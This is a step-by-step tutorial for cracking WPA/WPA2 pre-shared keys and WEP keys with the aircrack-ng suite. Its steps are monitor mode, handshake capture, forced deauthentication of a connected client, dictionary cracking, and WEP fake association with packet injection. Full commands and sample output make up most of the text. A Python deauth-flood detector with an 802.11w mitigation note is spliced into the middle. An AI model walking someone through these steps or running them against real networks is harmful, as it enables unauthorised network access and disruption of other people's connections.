Crack a WPA/WPA2 Wifi Network
What is the difference between cracking a WPA network and a WPA2 network? Nothing! There is no difference between cracking WPA and WPA2 networks at all. In order to successfully crack any WPA/WPA2 network, two things must happen:
1) You must capture the full 4-way handshake.
2) The passphrase must be in the dictionary you choose, or the brute force will not succeed.
We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.
There are a few ways to crack a WPA/WPA2 PSK password; this is just one of them.
This method usually works because of the end user: most people choose a passphrase that is easy to remember, because nobody wants to keep a long password.
You will need the following details:
A client connected to the AP, to deauth.
ESSID = the name of your wireless network, e.g. MYWIRELESS.
BSSID = the MAC address of your AP, in the format 00:1C:10:26:A9:39. Everyone's is different, so make sure you write it down correctly or the following will not work.
Channel = the channel your AP is broadcasting on, e.g. channel 7.
You will also need a decent dictionary file; there are many of these around on the internet. The steps are below.
Step 1 - Start the wireless interface in monitor mode
alex@alex-laptop:~$ sudo airmon-ng start wlan0
[sudo] password for alex:
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
767 avahi-daemon
768 avahi-daemon
973 NetworkManager
1054 wpa_supplicant
11423 dhclient
Process with PID 11423 (dhclient) is running on interface wlan0
Process with PID 11990 (airodump-ng) is running on interface mon0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon2)
mon0 Intel 3945ABG iwl3945 - [phy0]
mon1 Intel 3945ABG iwl3945 - [phy0]
Step 2 - Start airodump-ng to collect authentication handshake
The BSSID can be found with iwlist wlan0 scanning.
airodump-ng -c 6 -w psk --bssid 00:21:27:47:D3:B0 mon0 // mon0 is the monitor-mode interface that sudo airmon-ng start wlan0 created for wlan0 above
Where:
-c 6 is the channel of the wireless network
--bssid 00:21:27:47:D3:B0 is the access point MAC address. This eliminates extraneous traffic.
-w psk is the file name prefix for the capture files (the files that will contain the IVs).
mon0 is the interface name.
Important: Do NOT use the "--ivs" option. You must capture the full packets.
Step 3 - Use aireplay-ng to deauthenticate the wireless client
aireplay-ng -0 3 -a 00:21:27:47:D3:B0 -c 00:1C:BF:54:10:7E mon0
Where:
-0 means deauthentication
3 is the number of deauths to send (you can send multiple if you wish)
-a 00:21:27:47:D3:B0 is the MAC address of the access point
-c 00:1C:BF:54:10:7E is the MAC address of the client you are deauthing
mon0 is the interface name
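The deauthentication burst in Step 3 is also what a wireless IDS watches for. The following Python is an added example, not part of the original tutorial: it runs a sliding-window detector over constructed 802.11 management-frame records (the MAC addresses are the ones used on this page; the record layout, reason codes and thresholds are assumptions) and flags address pairs that emit a burst of deauth/disassoc frames.

```python
from collections import defaultdict, deque

# MAC addresses from the tutorial above; everything else here is constructed sample data.
AP = "00:21:27:47:D3:B0"
CLIENT = "00:1C:BF:54:10:7E"
OTHER = "00:1c:bf:87:70:66"
BCAST = "ff:ff:ff:ff:ff:ff"


def _burst(start, count, src, dst, gap=0.002):
    """Constructed flood: `count` deauth frames from src to dst, `gap` seconds apart."""
    return [(start + i * gap, "deauth", src, dst, 7) for i in range(count)]


# Records as a monitor-mode sniffer might log them (constructed):
# (timestamp in seconds, frame subtype, source MAC, destination MAC, reason code or None).
SAMPLE_FRAMES = (
    [(10.00, "beacon", AP, BCAST, None),
     (10.30, "deauth", AP, OTHER, 3),          # a single deauth: a station leaving, not a flood
     (10.50, "assoc_resp", AP, CLIENT, None)]
    + _burst(12.000, 8, AP, CLIENT)             # forged "AP -> client" deauths
    + _burst(12.001, 8, CLIENT, AP)             # forged "client -> AP" deauths
)


def detect_deauth_flood(frames, window=1.0, threshold=5):
    """Return {(src, dst): peak} for address pairs whose deauth/disassoc count reached
    `threshold` inside some `window`-second sliding window; peak is the highest count seen."""
    recent = defaultdict(deque)
    flagged = {}
    for ts, subtype, src, dst, _reason in sorted(frames, key=lambda f: f[0]):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while ts - q[0] > window:       # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            flagged[(src, dst)] = max(flagged.get((src, dst), 0), len(q))
    return flagged


def describe(flagged, known_aps):
    """Label each flagged pair: a flood carrying an AP's own BSSID as source is spoofed."""
    return {pair: ("spoofed AP address" if pair[0] in known_aps else "station address")
            for pair in flagged}


if __name__ == "__main__":
    hits = detect_deauth_flood(SAMPLE_FRAMES)
    for pair, label in describe(hits, {AP}).items():
        print(f"{pair[0]} -> {pair[1]}: {hits[pair]} frames in window, {label}")
```

A burst whose source address is the AP's own BSSID is almost certainly forged; enabling 802.11w Protected Management Frames on the AP is the mitigation, since it makes unauthenticated deauth frames ineffective.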
Step 4 - Run aircrack-ng to crack the pre-shared key
The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.
There is a small dictionary that comes with aircrack-ng, "password.lst". This file can be found in the "test" directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe it into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.
aircrack-ng -w dictionary.txt -b 00:21:27:47:D3:B0 psk*.cap
Where:
-w dictionary.txt is the name of the dictionary file (for example password.lst). Remember to specify the full path if the file is not located in the same directory.
-b 00:21:27:47:D3:B0 is the MAC address of the access point whose handshake you want to crack.
psk*.cap is the group of files containing the captured packets. Notice that we used the wildcard * to include multiple files.
Done. Now wait for some time; how long depends on your dictionary file and the passphrase.
You should now have your PSK passphrase. // the password is obtained.
References:
http://www.outpost9.com/files/WordLists.html (word lists)
http://wordlist.sourceforge.net/ (Kevin's Word List Page)
Cracking WEP and WPA Wireless Networks
Another way: cracking WEP
1. sudo airmon-ng start wlan0 starts monitor mode on the wireless card.
2. In a terminal, run sudo airodump-ng mon0. After monitor mode is started the wireless interface is mon0 (if airmon-ng is started several times, the number increments). Look at which WEP-encrypted APs are online, then press Ctrl+C to exit and keep the terminal open.
3. Open another terminal and run sudo airodump-ng -c 6 --bssid 00:1D:0F:7D:D9:1A -w wep mon0
(the 6 after -c is the AP's channel, the MAC after --bssid is the MAC address of the AP to be cracked, and the wep after -w is the file name prefix for the captured DATA packets (any name will do)), then press Enter to start capturing.
4. Open another terminal and run sudo aireplay-ng -1 0 -a 00:1D:0F:7D:D9:1A -h 00:1c:bf:87:70:66 mon0
to establish a fake association with the AP (the MAC after -h is your own wireless card's MAC address).
5. Once the fake association succeeds, run sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:1D:0F:7D:D9:1A -h 00:1c:bf:87:70:66 mon0
to inject; the DATA count in step 3 should now keep growing.
6. After more than 5000 DATA packets have been collected, open another terminal and run sudo aircrack-ng wep*.cap to crack the key (if the key is not found, keep waiting; aircrack-ng re-runs automatically every time DATA grows by another 5000 until the key is found).
This was cracking the router in my own dorm.
7. After the key is cracked, run sudo airmon-ng stop mon0 in a terminal to turn off monitor mode; otherwise the wireless card will keep injecting into that AP. Neither Ctrl+C nor closing the terminal stops it; only a reboot does.